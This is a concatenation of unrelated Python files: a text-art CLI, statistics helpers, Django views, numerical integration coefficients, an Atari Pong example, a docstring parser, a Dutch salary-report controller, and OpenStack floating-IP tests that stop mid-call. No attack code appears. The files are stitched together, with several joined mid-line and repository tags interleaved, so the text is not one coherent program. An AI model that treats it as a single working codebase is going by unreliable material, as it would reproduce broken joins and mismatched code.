""" import click from PIL import Image from ...draw import RESAMPLING_FILTERS, DEFAULT_RESAMPLING from ...format import FORMATTERS, DEFAULT_FORMATTER from ...utils import terminal_size from .gradient import draw_gradient from .braille import draw_braille @click.group(options_metavar="[options]", subcommand_metavar="<command> [args]") @click.argument("path", type=click.Path(exists=True), metavar="<path>") @click.option( "-c", "--colorize", is_flag=True, help="Apply image colors to output text." ) @click.option( "-m", "--mode", type=click.Choice(list(FORMATTERS.keys())), default=DEFAULT_FORMATTER, help="Format mode for output text.", show_default=True, ) @click.option( "-r", "--resample", type=click.Choice(list(RESAMPLING_FILTERS.keys())), default=DEFAULT_RESAMPLING, help="Resampling filter.", show_default=True, ) @click.option( "-H", "--height", type=int, default=0, help="Height of output text in characters.\n\nIf 0, derives from width.", show_default=True, ) @click.option( "-W", "--width", type=int, default=0, help="Width of output text in characters.\n\nIf 0, derives from height.", show_default=True, ) @click.option( "-term-h", "--terminal-height", is_flag=True, help="Sets height to terminal height.", ) @click.option( "-term-w", "--terminal-width", is_flag=True, help="Sets width to terminal width.", ) @click.pass_context def draw( context, path, colorize, mode, resample, height, width, terminal_height, terminal_width, ): """Generate text art from an image. <path> Path to the image file. """ image = Image.open(path) if terminal_width or terminal_height or height == 0 and width == 0: term_h, term_w = terminal_size() if terminal_height: height = term_h if terminal_width: width = term_w if height == 0 and width == 0: height = term_h width = term_w context.obj = { "image": image, "colorize": colorize, "mode": mode, "resample": resample, "height": height, "width": width, } draw.add_command(draw_gradient) draw.add_command(draw_braille) <gh_stars>1-10 # Copyright (c) Gradient Institute. All rights reserved. # Licensed under the Apache 2.0 License. """Extra statistical functions.""" import numpy as np from sklearn.linear_model import LinearRegression def conditional_cov(X, Y, estimator=None, bias=False, ddof=None): r"""Compute the conditional covariance, COV(Y|X). This computes: COV(Y|X) = E[(Y - E[Y|X]) (Y - E[Y|X]).T | X] = COV(R) where R = Y - E[Y|X] E[Y|X] is computed using a regression estimate, you have the option of providing the estimator. The last line can be derived from noting the law of total expectation, E[R] = E[Y - E[Y|X]] = E[Y] - E[E[Y|X]], where E[E[Y|X]] = E[Y] = 0 So COV(R) = E[(R - E[R]) (R - E[R]).T | X] = E[R R.T | X] = COV(Y|X) Parameters ---------- X: ndarray, DataFrame A two-dimensional (n, p) array of conditioning variables. Y: ndarray, DataFrame A two-dimensional (n, d) array of variables. estimator: optional, scikit learn multiple output regression estimator A multiple output regression estimator. By default this is a LinearRegression estimator. This is to compute the relationship E[Y|X] for the conditional covariance. bias: bool How to normalise the covariance matrix. See numpy.cov for more details. ddof: optional, int The degrees of freedom to use for normalisation. See numpy.cov for more details. Returns ------- ndarray a (d, d) symmetric positive definite matrix of the conditional covariance between the columns of Y, COV(Y|X). 
""" if estimator is None: estimator = LinearRegression() EY_X = estimator.fit(X, Y).predict(X) RY = Y - EY_X cov = np.cov(RY.T, bias=bias, ddof=ddof) # equal E[(Y-E[Y|X])(Y-E[Y|X]).T] return cov def conditional_corrcoef(X, Y, estimator=None): r"""Compute the conditional correlation, CORR(Y|X). This is the normalised covariance, CORR_i,j = COV_i,j / sqrt(Var_i, Var_j) Parameters ---------- X: ndarray, DataFrame A two-dimensional (n, p) array of conditioning variables. Y: ndarray, DataFrame A two-dimensional (n, d) array of variables. estimator: optional, scikit learn multiple output regression estimator A multiple output regression estimator. By default this is a LinearRegression estimator. This is to compute the relationship E[Y|X] for the conditional covariance. Returns ------- ndarray a (d, d) symmetric matrix of the conditional correlation between the columns of Y, CORR(Y|X). """ cov = conditional_cov(X, Y, estimator) var = np.diag(cov) corr = cov / np.sqrt(np.outer(var, var)) return corr from django.shortcuts import render_to_response def home(request): return render_to_response('blog/index.html') def blog(request): return render_to_response('blog/blog.html')<gh_stars>1-10 """The WaveBlocks Project This file contains data to build several closely related processing splitting methods. @author: <NAME>, <NAME> @copyright: Copyright (C) 2014 <NAME> @license: Modified BSD License """ from numpy import zeros __all__ = ["ProcessingSplittingParameters"] class ProcessingSplittingParameters(object): def build(self, method): r""" :param method: A string specifying the method for time integration. :return: Four arrays :math:`a`, :math:`b` and :math:`y`, :math:`z`. ====== ======= ================= ========= Method Order Authors Reference ====== ======= ================= ========= BCR764 (7,6,4) Blanes/Casas/Ros [1]_ table (iv) ====== ======= ================= ========= .. [1] <NAME>, <NAME>, and <NAME>, "Symplectic Integration with Processing: A General Study", SIAM Journal on Scientific Computing, Volume 21, Issue 2, (1999) 711-727. """ if method == "BCR764": # Kernel Pattern ABA # Exchanged a and b compared to the paper in # order to have consistency with other code a = zeros(4) a[0] = 0.0 a[1] = 1.5171479707207228 a[2] = -2.0342959414414454 a[3] = 1.5171479707207228 b = zeros(4) b[0] = 0.5600879810924619 b[1] = -0.06008798109246194 b[2] = -0.06008798109246194 b[3] = 0.5600879810924619 # Pre/Post-Processor z = zeros(6) z[0] = -0.3346222298730 z[1] = 1.097567990732164 z[2] = -1.038088746096783 z[3] = 0.6234776317921379 z[4] = -1.102753206303191 z[5] = -0.0141183222088869 y = zeros(6) y[0] = -1.621810118086801 y[1] = 0.0061709468110142 y[2] = 0.8348493592472594 y[3] = -0.0511253369989315 y[4] = 0.5633782670698199 y[5] = -0.5 else: raise NotImplementedError("Unknown method: " + method) return a, b, y, z def intprepsplit(self, psi1, psi2, a, b, y, z, tspan, N, args1=[], args2=[]): r""" Compute a single, full propagation step by processing operator splitting. 
:param psi1: First evolution operator :math:`\Psi_a` :param psi2: Second evolution operator :math:`\Psi_b` :param a: Parameters for evolution with operator :math:`\Psi_a` :param b: Parameters for evolution with operator :math:`\Psi_b` :param y: Parameters for evolution with processor :math:`\Pi_y` :param z: Parameters for evolution with processor :math:`\Pi_z` :param tspan: Timespan :math:`t` of a single, full splitting step :param N: Number of substeps to perform :param args1: Additional optional arguments of :math:`\Psi_a` :param args2: Additional optional arguments of :math:`\Psi_b` .. note:: The values for ``args1`` and ``args2`` have to be of type ``list`` even in case of single items. """ s = a.shape[0] p = y.shape[0] h = (tspan[1] - tspan[0]) / float(N) # Preprocessor for j in range(p): psi1(-z[j] * h, *args1) psi2(-y[j] * h, *args2) # Kernel for k in range(N): for j in range(s): psi1(a[j] * h, *args1) psi2(b[j] * h, *args2) # Postprocessor for j in range(p - 1, -1, -1): psi1(y[j] * h, *args1) psi2(z[j] * h, *args2) import math x = float(input('digite um nr: ')) print(f'o nr digitado é {x} e sua parte inteira é {math.trunc(x)}') #from math import trunc,sqrt #print(trunc(x) # # int(x) - também retorna somente a parte inteira de x<filename>example/python_example.py import sys from random import randrange from ale_python_interface import ALEInterface import pygame ale = ALEInterface() # Get & Set the desired settings ale.setInt('random_seed', 123) # Set USE_SDL to true to display the screen. ALE must be compilied # with SDL enabled for this to work. On OSX, pygame init is used to # proxy-call SDL_main. USE_SDL = True if USE_SDL: if sys.platform == 'darwin': pygame.init() ale.setBool('sound', False) # Sound doesn't work on OSX elif sys.platform.startswith('linux'): ale.setBool('sound', True) ale.setBool('display_screen', True) # Load the ROM file ale.loadROM('Pong.bin') # Get the list of legal actions legal_actions = ale.getMinimalActionSet() print legal_actions # Play 10 episodes for episode in xrange(10): total_reward = 0 while not ale.game_over(): if pygame.key.get_pressed()[pygame.K_RIGHT]: print 'right' elif pygame.key.get_pressed() == pygame.K_LEFT: print 'left' a = legal_actions[randrange(len(legal_actions))] # Apply an action and get the resulting reward reward = ale.act(a); print 'Reward acquired: ', reward total_reward += reward print 'Episode', episode, 'ended with score:', total_reward ale.reset_game() import torch def churn(pred_1, pred_2): """ Shows the disagreement between two model's prediction. Higher the churn, more the disagreement. Bounds: [0,1]. Takes to prediction arrays as inputs and retuns churn. """ assert torch.tensor(pred_1).shape == torch.tensor(pred_2).shape, "Size mismatch between pred_1 and pred_2" match = torch.unique((pred_1 == pred_2), return_counts=True) disagreement = match[1][match[0] == False] churn = disagreement / torch.numel(pred_1) return churn pred_1 = torch.randint(0, 100, (1000,)) pred_2 = torch.randint(0, 100, (1000,)) churn(pred_1, pred_2) <gh_stars>0 """ Modules """ # each module has a specific functionality and is a different file # 1. import command # game.py # import the draw module import draw def play_game(): pass def main(): result = play_game() draw.draw_game(result) # draw.py def draw_game(): pass def clear_screen(screen): pass # 2. from command # game.py # import the draw module from draw import draw_game def main(): result = play_game() draw_game(result) # 3. 
import * # game.py # import the draw module from draw import * def main(): result = play_game() draw_game(result) # 4. import as # game.py # import the draw module if visual_mode: # in visual mode, we draw using graphics import draw_visual as draw else: # in textual mode, we print out text import draw_textual as draw def main(): result = play_game() # this can either be visual or textual depending on visual_mode draw.draw_game(result) # 5. dir and help # Just show fiddling around with help and dir in the terminalimport re def normalize(text): if text is not None: return text.strip() return None def normalize_type(text): text = normalize(text) if text is None: text = "" if text.startswith('{'): text = text[1:] if text.endswith('}'): text = text[:-1] return text def process_name(text): if text is None: return None, False, None is_optional = text.startswith('[') default_value = None if not is_optional: return text, False, None regex = re.compile( '\[(?P<name>[A-Za-z.]+)(?P<eq>=)?(?P<value>.+)?\]', ) match = regex.search(text) name = normalize(match.group('name')) try: default_value = normalize(match.group('value')) except: pass return name, is_optional, normalize(default_value) def preprocess_line(target): target = target.replace('@params', '@param') target = target.replace('@returns', '@return') return target def parse(regex, target): match = regex.search(target) if match is None: print("Failed to match string: " + target) return None, None, None arg_name = None arg_type = normalize(match.group('type')) arg_desc = normalize(match.group('desc')) try: arg_name = normalize(match.group('name')) except: pass arg_type = normalize_type( arg_type, ) arg_types = list(map( str.strip, filter(None, arg_type.split('|')), )) arg_desc = arg_desc.capitalize() return arg_name, arg_types, arg_desc def process_returns(returns): if returns is None: return None regex = re.compile( '@return\s*(?P<type>{.+})\s*-\s*(?P<desc>.+)', ) arg_name, arg_types, arg_desc = parse( regex, returns, ) if arg_desc is None: return None return { 'name': arg_name, 'type': arg_types, 'desc': arg_desc, } def process_params(params): regex = re.compile( '@param\s*(?P<type>{.+})\s*(?P<name>.+)?\s*-\s*(?P<desc>.+)', ) for num, param in enumerate(params, start=1): arg_name, arg_types, arg_desc = parse( regex, param, ) arg_optional = False arg_default_value = None if arg_name is not None: arg_name, arg_optional, arg_default_value = process_name(arg_name) else: print(param) arg_name = "param" + str(num) if arg_types is not None: yield { 'name': arg_name, 'type': arg_types, 'desc': arg_desc, 'optional': arg_optional, 'default_value': arg_default_value } def transform_extract(extract): content, params, returns = [], [], None for line in extract.content: line = preprocess_line(line.strip()) if line.startswith('@param'): params.append(line) continue if line.startswith('@return'): returns = line continue if returns is not None: returns = f'{returns} {line}' continue if len(params) > 0: params[-1] = f'{params[-1]} {line}' continue if len(params) == 0: content.append(line) continue content = ' '.join(content) returns = process_returns(returns) params = list(process_params(params)) return { 'desc': content, 'params': params, 'returns': returns, } import web from web import form import model.ordergroup import model.regels from controller import Controller from functions import table_string class Salaris(Controller): def __init__(self): Controller.__init__(self) # subclass specific self.title = 'Salaris' self.module = 'salaris' self.webrender = 
web.template.render('webpages/salaris/') # Salaris specific: ordergroup_file = str(web.input(ordergroup='LION.1GS')['ordergroup']) self.year = int(web.input(year=2017)['year']) self.orders = model.ordergroup.load(ordergroup_file).list_orders_recursive().keys() # Forms dropdown_options = self.dropdown_options() self.form_settings_simple = form.Form( form.Dropdown('ordergroup', dropdown_options['ordergroups_all'], description='Order Group', value=ordergroup_file), form.Dropdown('year', dropdown_options['years'], value=self.year, class_="btn btn-default btn-sm"), form.Button('submit', value='salaris_settings') ) def authorized(self): return model.users.check_permission(['salaris']) def process_sub(self): regels = model.regels.load(table_names_load=['salaris_plan', 'salaris_geboekt', 'salaris_obligo'], orders_load=self.orders,years_load=[self.year]) data = self.create_data_structure(regels) report = {} report['settings'] = self.render_settings() report['summary'] = self.render_summary(data) report['body'] = self.render_body(data) report['javaScripts'] = self.webrender.salaris_javascripts( data['orders'].keys() + ['payrollnr_nomatch', 'payrollnr_nokosten', 'payrollnr_match']) self.body = self.webrender.salaris(report) """ Returns 'data' (dict) needed to build the webpage. Not we use the payrollnr as the key as they are unique per person while a single person might have multiple contracts and hence personeelsnummers. data-structure for total overview: data['totals'] = {'begroot/realisatie/obligo/resultaat' as decimal, ..} data-structure for view per payrollnr: data['payrollnrs'][<payrollnr>] = {'begroot/realisatie/obligo/resultaat' as decimal, 'naam' as string, 'realiatie-perc' as decimal, 'match' as Boolean that is True if begroot/realisatie could be coupled via payroll/persnr} data-structure for overview per order: data['orders'][<ordernummer>] = {'naam' as string, ..} data['orders'][<ordernummer>]['totals'] = {'begroot/realisatie/obligo/resultaat' as decimal'} data['orders'][<ordernummer>]['payrollnrs'][<payrollnr>] = {'match' as Boolean (True if begroot and realisatie/obligo on the correct order), 'begroot/realisatie/obligo/resultaat' as decimal, 'naam' as string, 'realiatie-perc' as decimal} data-structure for overview per tiepe (match/nomatch/nokosten): data['tiepe'][<tiepe>] = {'naam' as string, ..} data['tiepe'][<tiepe>]['totals'] = {'begroot/realisatie/obligo/resultaat' as decimal'} data['tiepe'][<tiepe>]['payrollnrs'][<payrollnr>] = {'match' as Boolean (True if begroot and realisatie/obligo on the correct order), 'begroot/realisatie/obligo/resultaat' as decimal, 'naam' as string, 'realiatie-perc' as decimal} """ def create_data_structure(self, regels): try: # not always are there obligo's around obligo = regels.split(['tiepe', 'personeelsnummer'])['salaris_obligo'] except: obligo = None regels_per_order = regels.split(['ordernummer']) payroll_map = self.payroll_map(obligo) last_periode = model.regels.last_periode() order_list = model.orders.load().split(['ordernummer']) data = {'totals': {'salaris_plan': 0, 'salaris_obligo': 0, 'salaris_geboekt': 0, 'resultaat': 0}, 'orders': {}, 'payrollnrs': {}, 'match': {'payrollnrs': {}, 'totals': {'salaris_plan': 0, 'salaris_obligo': 0, 'salaris_geboekt': 0, 'resultaat': 0}}, 'nomatch': {'payrollnrs': {}, 'totals': {'salaris_plan': 0, 'salaris_obligo': 0, 'salaris_geboekt': 0, 'resultaat': 0}}, 'nokosten': {'payrollnrs': {}, 'totals': {'salaris_plan': 0, 'salaris_obligo': 0, 'salaris_geboekt': 0, 'resultaat': 0}}} for order, regelList in 
regels_per_order.iteritems(): if order not in data['orders']: name = order_list[order].orders[0].ordernaam data['orders'][order] = {'naam': name, 'totals': {'salaris_plan': 0, 'salaris_obligo': 0, 'salaris_geboekt': 0, 'resultaat': 0}, 'payrollnrs': {}} for regel in regelList.regels: match = False if regel.tiepe == 'salaris_geboekt' or regel.tiepe == 'salaris_plan': if regel.personeelsnummer in payroll_map: payrollnr = payroll_map[regel.personeelsnummer] match = True else: payrollnr = regel.personeelsnummer else: payrollnr = regel.payrollnummer if regel.tiepe == 'salaris_obligo' and regel.periode < last_periode: # only allow obligos that are yet to come continue # data - order - payroll if payrollnr not in data['orders'][order]['payrollnrs']: data['orders'][order]['payrollnrs'][payrollnr] = {'naam': regel.personeelsnaam, 'match': match, 'salaris_plan': 0, 'salaris_obligo': 0, 'salaris_geboekt': 0, 'resultaat': 0} data['orders'][order]['payrollnrs'][payrollnr]['match'] = match or data['orders'][order]['payrollnrs'][ payrollnr]['match'] # once it is true it should stay true data['orders'][order]['payrollnrs'][payrollnr][regel.tiepe] += regel.kosten data['orders'][order]['payrollnrs'][payrollnr]['resultaat'] = \ data['orders'][order]['payrollnrs'][payrollnr]['salaris_plan'] - \ data['orders'][order]['payrollnrs'][payrollnr]['salaris_geboekt'] - \ data['orders'][order]['payrollnrs'][payrollnr]['salaris_obligo'] if data['orders'][order]['payrollnrs'][payrollnr]['salaris_plan'] > 0: data['orders'][order]['payrollnrs'][payrollnr]['resultaat_perc'] = \ data['orders'][order]['payrollnrs'][payrollnr]['salaris_geboekt'] / \ data['orders'][order]['payrollnrs'][payrollnr]['salaris_plan'] else: data['orders'][order]['payrollnrs'][payrollnr]['resultaat_perc'] = 0 # data - order - totals data['orders'][order]['totals'][regel.tiepe] += regel.kosten data['orders'][order]['totals']['resultaat'] = data['orders'][order]['totals']['salaris_plan'] - \ data['orders'][order]['totals']['salaris_geboekt'] - \ data['orders'][order]['totals']['salaris_obligo'] # data - payroll if payrollnr not in data['payrollnrs']: data['payrollnrs'][payrollnr] = {'naam': regel.personeelsnaam, 'match': match, 'salaris_plan': 0, 'salaris_obligo': 0, 'salaris_geboekt': 0, 'resultaat': 0, 'orders': {}} data['payrollnrs'][payrollnr]['match'] = match or data['payrollnrs'][payrollnr][ 'match'] # once it is true it should stay true data['payrollnrs'][payrollnr][regel.tiepe] += regel.kosten data['payrollnrs'][payrollnr]['resultaat'] = data['payrollnrs'][payrollnr]['salaris_plan'] - \ data['payrollnrs'][payrollnr]['salaris_geboekt'] - \ data['payrollnrs'][payrollnr]['salaris_obligo'] if data['payrollnrs'][payrollnr]['salaris_plan'] > 0: data['payrollnrs'][payrollnr]['resultaat_perc'] = data['payrollnrs'][payrollnr]['salaris_geboekt'] / \ data['payrollnrs'][payrollnr]['salaris_plan'] else: data['payrollnrs'][payrollnr]['resultaat_perc'] = 0 if order not in data['payrollnrs'][payrollnr]['orders']: data['payrollnrs'][payrollnr]['orders'][order] = {'salaris_plan': 0, 'salaris_obligo': 0, 'salaris_geboekt': 0, 'resultaat': 0} data['payrollnrs'][payrollnr]['orders'][order][regel.tiepe] += regel.kosten data['payrollnrs'][payrollnr]['orders'][order]['resultaat'] = \ data['payrollnrs'][payrollnr]['orders'][order]['salaris_plan'] - \ data['payrollnrs'][payrollnr]['orders'][order]['salaris_obligo'] - \ data['payrollnrs'][payrollnr]['orders'][order]['salaris_geboekt'] # data - match/nomatch/nokosten - .. # We have to this this in sep. 
loop because we need the # plan/geboekt/obligo regels matched first. for payrollnr, row in data['payrollnrs'].iteritems(): if row['match']: tiepe = 'match' elif row['salaris_geboekt'] > 0 or row['salaris_obligo'] > 0: tiepe = 'nomatch' else: tiepe = 'nokosten' # data - match/nomatch/nokosten - payroll data[tiepe]['payrollnrs'][payrollnr] = row # data - match/nomatch/nokosten - totals # data - totals for kosten_tiepe in ['salaris_plan', 'salaris_geboekt', 'salaris_obligo', 'resultaat']: data[tiepe]['totals'][kosten_tiepe] += row[kosten_tiepe] data['totals'][kosten_tiepe] += row[kosten_tiepe] return data """ construct hash_map for payroll to personeelsnummers note that payroll nummers will always have 1 personeelsnummer while multiple personeelsnummers (contracts) may refer to a single payrollnumber """ def payroll_map(self, regels_obligo): payroll_map = {} # { 'persnr': payrollnummer } if regels_obligo: for persnr, regelList in regels_obligo.iteritems(): for regel in regelList.regels: if persnr not in payroll_map: payroll_map[persnr] = regel.payrollnummer else: if regel.payrollnummer != payroll_map[persnr]: print 'ERRROR, multiple payrollnumbers for a single personeelsnummer' print persnr print regel.payrollnummer exit() return payroll_map def render_body(self, data): order_tables = self.render_order_tables(data) tiepe_tables = self.render_tiepe_tables(data) return self.webrender.salaris_body(order_tables, tiepe_tables) def render_tiepe_tables(self, data): tiepe_tables = [] headers = {} headers['names'] = {'match': 'Begroot en kosten', 'nomatch': 'Niet begroot wel kosten', 'nokosten': 'Wel begroot geen kosten'} for tiepe in ['match', 'nomatch', 'nokosten']: table = [] headers[tiepe] = {} headers[tiepe]['id'] = 'payrollnr_' + tiepe headers[tiepe]['img'] = '../static/figs/dummy.png' headers[tiepe]['name'] = headers['names'][tiepe] headers[tiepe]['ordernaam'] = headers['names'][tiepe] headers[tiepe]['begroot'] = table_string(data[tiepe]['totals']['salaris_plan']) headers[tiepe]['geboekt'] = table_string(data[tiepe]['totals']['salaris_geboekt']) headers[tiepe]['obligo'] = table_string(data[tiepe]['totals']['salaris_obligo']) headers[tiepe]['resultaat'] = table_string(data[tiepe]['totals']['resultaat']) for payrollnr in data[tiepe]['payrollnrs'].keys(): item = data[tiepe]['payrollnrs'][payrollnr] row = {} row['naam'] = item['naam'] row['personeelsnummer'] = payrollnr row['begroot'] = table_string(item['salaris_plan']) row['geboekt'] = table_string(item['salaris_geboekt']) row['obligo'] = table_string(item['salaris_obligo']) row['resultaat'] = table_string(item['resultaat']) row['resultaat_perc'] = '%.f' % (item['resultaat_perc'] * 100) + '%' row['td_class'] = 'success' if item['match'] else 'danger' row['details'] = False row['orders'] = [] for order in item['orders']: row['details'] = True order_item = {'ordernummer': '%s - %s' % (data['orders'][order]['naam'], order)} for key in ['salaris_plan', 'salaris_obligo', 'salaris_geboekt', 'resultaat']: order_item[key] = table_string(item['orders'][order][key]) row['orders'].append(order_item) table.append(self.webrender.salaris_personeel_regel(row)) tiepe_tables.append(self.webrender.salaris_table_order(table, headers[tiepe], 'persoon')) return tiepe_tables def render_order_tables(self, data): order_tables = [] for order in data['orders'].keys(): header = {} header['id'] = order header['img'] = '../static/figs/dummy.png' header['name'] = data['orders'][order]['naam'] + ' - ' + str(order) header['ordernaam'] = data['orders'][order]['naam'] 
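            # The header row aggregates the order's planned salary ('begroot'),
            # booked costs ('geboekt'), outstanding obligations ('obligo') and the
            # remaining balance ('resultaat'); the per-person rows built below get
            # the 'success' (green) style when budget and bookings were matched via
            # the payroll number and 'danger' (red) otherwise.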
header['begroot'] = table_string(data['orders'][order]['totals']['salaris_plan']) header['geboekt'] = table_string(data['orders'][order]['totals']['salaris_geboekt']) header['obligo'] = table_string(data['orders'][order]['totals']['salaris_obligo']) header['resultaat'] = table_string(data['orders'][order]['totals']['resultaat']) table_items = [] for payrollnr in data['orders'][order]['payrollnrs'].keys(): item = data['orders'][order]['payrollnrs'][payrollnr] row = {} row['naam'] = item['naam'] row['personeelsnummer'] = payrollnr row['begroot'] = table_string(item['salaris_plan']) row['geboekt'] = table_string(item['salaris_geboekt']) row['obligo'] = table_string(item['salaris_obligo']) row['resultaat'] = table_string(item['resultaat']) row['resultaat_perc'] = '%.f' % (item['resultaat_perc'] * 100) + '%' row['td_class'] = 'success' if item['match'] else 'danger' row['details'] = False table_items.append(self.webrender.salaris_personeel_regel(row)) order_tables.append(self.webrender.salaris_table_order(table_items, header, 'order')) return order_tables def render_settings(self): form_settings = self.form_settings_simple return self.webrender.salaris_settings(form_settings) def render_summary(self, data): begroot = data['totals']['salaris_plan'] geboekt = data['totals']['salaris_geboekt'] obligo = data['totals']['salaris_obligo'] kosten = data['totals']['salaris_geboekt'] + data['totals']['salaris_obligo'] resultaat = data['totals']['resultaat'] html = {} html['begroot'] = table_string(begroot) html['geboekt'] = table_string(geboekt) html['obligo'] = table_string(obligo) html['resultaat'] = table_string(resultaat) html['totaalkosten'] = table_string(kosten) return self.webrender.salaris_summary(html) <filename>openstackclient/tests/functional/network/v2/test_floating_ip.py # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. 
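# A small worked example of the totals combined by render_summary above; the
# numbers and variable names are hypothetical and only illustrate the arithmetic:
begroot_totaal = 120_000.0   # planned salary budget
geboekt_totaal = 80_000.0    # salary costs already booked
obligo_totaal = 30_000.0     # remaining salary obligations
totaalkosten = geboekt_totaal + obligo_totaal                 # 110000.0
resultaat = begroot_totaal - geboekt_totaal - obligo_totaal   # 10000.0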
import json import random import uuid from openstackclient.tests.functional.network.v2 import common class FloatingIpTests(common.NetworkTests): """Functional tests for floating ip""" EXTERNAL_NETWORK_NAME = uuid.uuid4().hex EXTERNAL_SUBNET_NAME = uuid.uuid4().hex PRIVATE_NETWORK_NAME = uuid.uuid4().hex PRIVATE_SUBNET_NAME = uuid.uuid4().hex ROUTER = uuid.uuid4().hex PORT_NAME = uuid.uuid4().hex @classmethod def setUpClass(cls): common.NetworkTests.setUpClass() if cls.haz_network: # Create a network for the floating ip json_output = json.loads(cls.openstack( 'network create -f json ' + '--external ' + cls.EXTERNAL_NETWORK_NAME )) cls.external_network_id = json_output["id"] # Create a private network for the port json_output = json.loads(cls.openstack( 'network create -f json ' + cls.PRIVATE_NETWORK_NAME )) cls.private_network_id = json_output["id"] # Try random subnet range for subnet creating # Because we can not determine ahead of time what subnets are # already in use, possibly by another test running in parallel, # try 4 times for i in range(4): # Make a random subnet cls.external_subnet = ".".join(map( str, (random.randint(0, 223) for _ in range(3)) )) + ".0/26" cls.private_subnet = ".".join(map( str, (random.randint(0, 223) for _ in range(3)) )) + ".0/26" try: # Create a subnet for the network json_output = json.loads(cls.openstack( 'subnet create -f json ' + '--network ' + cls.EXTERNAL_NETWORK_NAME + ' ' + '--subnet-range ' + cls.external_subnet + ' ' + cls.EXTERNAL_SUBNET_NAME )) cls.external_subnet_id = json_output["id"] # Create a subnet for the private network json_output = json.loads(cls.openstack( 'subnet create -f json ' + '--network ' + cls.PRIVATE_NETWORK_NAME + ' ' + '--subnet-range ' + cls.private_subnet + ' ' + cls.PRIVATE_SUBNET_NAME )) cls.private_subnet_id = json_output["id"] except Exception: if (i == 3): # raise the exception at the last time raise pass else: # break and no longer retry if create sucessfully break @classmethod def tearDownClass(cls): if cls.haz_network: del_output = cls.openstack( 'subnet delete ' + cls.EXTERNAL_SUBNET_NAME + ' ' + cls.PRIVATE_SUBNET_NAME ) cls.assertOutput('', del_output) del_output = cls.openstack( 'network delete ' + cls.EXTERNAL_NETWORK_NAME + ' ' + cls.PRIVATE_NETWORK_NAME ) cls.assertOutput('', del_output) def setUp(self): super(FloatingIpTests, self).setUp() # Nothing in this class works with Nova Network if not self.haz_network: self.skipTest("No Network service present") # Verify setup self.assertIsNotNone(self.external_network_id) self.assertIsNotNone(self.private_network_id) self.assertIsNotNone(self.external_subnet_id) self.assertIsNotNone(self.private_subnet_id) def test_floating_ip_delete(self): """Test create, delete multiple""" json_output = json.loads(self.openstack( 'floating ip create -f json ' + '--description aaaa ' + self.EXTERNAL_NETWORK_NAME )) self.assertIsNotNone(json_output["id"]) ip1 = json_output["id"] self.assertEqual( 'aaaa', json_output["description"], ) json_output = json.loads(self.openstack( 'floating ip create -f json ' + '--description bbbb ' + self.EXTERNAL_NETWORK_NAME )) self.assertIsNotNone(json_output["id"]) ip2 = json_output["id"] self.assertEqual( 'bbbb', json_output["description"], ) # Clean up after ourselves del_output = self.openstack('floating ip delete ' + ip1 + ' ' + ip2) self.assertOutput('', del_output) self.assertIsNotNone(json_output["floating_network_id"]) def test_floating_ip_list(self): """Test create defaults, list filters, delete""" json_output = json.loads(self.openstack( 
            'floating ip create -f json ' +
            '--description aaaa ' +
            self.EXTERNAL_NETWORK_NAME
        ))
        self.assertIsNotNone(json_output["id"])
        ip1 = json_output["id"]
        self.addCleanup(self.openstack, 'floating ip delete ' + ip1)
        self.assertEqual(
            'aaaa',
            json_output["description"],
        )
        self.assertIsNotNone(json_output["floating_network_id"])
        fip1 = json_output["floating_ip_address"]

        json_output = json.loads(self.openstack(
            'floating ip create -f json ' +
            '--description bbbb ' +
            self.EXTERNAL_NETWORK_NAME
        ))
        self.assertIsNotNone(json_output["id"])
        ip2 = json_output["id"]
        self.addCleanup(self.openstack, 'floating ip delete ' + ip2)
        self.assertEqual(
            'bbbb',
            json_output["description"],
        )
        self.assertIsNotNone(json_output["floating_network_id"])
        fip2 = json_output["floating_ip_address"]

        # Test list
        json_output = json.loads(self.openstack(
            'floating ip list -f json'
        ))
        fip_map = {
            item.get('ID'): item.get('Floating IP Address')
            for item in json_output
        }
        # self.assertEqual(item_map, json_output)
        self.assertIn(ip1, fip_map.keys())
        self.assertIn(ip2, fip_map.keys())
        self.assertIn(fip1, fip_map.values())
        self.assertIn(fip2, fip_map.values())

        # Test list --long
        json_output = json.loads(self.openstack(
            'floating ip list -f json ' +
            '--long'
        ))
        fip_map = {
            item.get('ID'): item.get('Floating IP Address')
            for item in json_output
        }
        self.assertIn(ip1, fip_map.keys())
        self.assertIn(ip2, fip_map.keys())
        self.assertIn(fip1, fip_map.values())
        self.assertIn(fip2, fip_map.values())
        desc_map = {
            item.get('ID'): item.get('Description')
            for item in json_output
        }
        self.assertIn('aaaa', desc_map.values())
        self.assertIn('bbbb', desc_map.values())

        # TODO(dtroyer): add more filter tests

        json_output = json.loads(self.openstack(
            'floating ip show -f json ' +
            ip1
        ))
        self.assertIsNotNone(json_output["id"])
        self.assertEqual(
            ip1,
            json_output["id"],
        )
        self.assertEqual(
            'aaaa',
            json_output["description"],
        )
        self.assertIsNotNone(json_output["floating_network_id"])
        self.assertEqual(
            fip1,
            json_output["floating_ip_address"],
        )

    def test_floating_ip_set_and_unset_port(self):
        """Test Floating IP Set and Unset port"""
        json_output = json.loads(self.openstack(
            'floating ip create -f json ' +
            '--description aaaa ' +
            self.EXTERNAL_NETWORK_NAME
        ))
        self.assertIsNotNone(json_output["id"])
        ip1 = json_output["id"]
        self.addCleanup(self.openstack, 'floating ip delete ' + ip1)
        self.assertEqual(
            'aaaa',
            json_output["description"],
        )

        json_output = json.loads(self.openstack(
            'port create -f json ' +
            '--network ' + self.PRIVATE_NETWORK_NAME + ' ' +
            '--fixed-ip subnet=' + self.PRIVATE_SUBNET_NAME + ' ' +
            self.PORT_NAME
        ))
        self.assertIsNotNone(json_output["id"])
        port_id = json_output["id"]

        json_output = json.loads(self.openstack(
            'router create -f json ' +
            self.ROUTER
        ))
        self.assertIsNotNone(json_output["id"])
        self.addCleanup(self.openstack, 'router delete ' + self.ROUTER)

        self.openstack(
            'router add port ' +
            self.ROUTER + ' ' +
            port_id
        )
        self.openstack(
            'router set ' +
            '--external-gateway ' + self.EXTERNAL_NETWORK_NAME + ' ' +
            self.ROUTER
        )
        self.addCleanup(
            self.openstack,
            'router unset --external-gateway ' + self.ROUTER,
        )
        self.addCleanup(
            self.openstack,
            'router remove port ' + self.ROUTER + ' ' + port_id,
        )

        self.openstack(
            'floating ip set ' +
            '--port ' + port_id + ' ' +
            ip1
        )
        self.addCleanup(
            self.openstack,
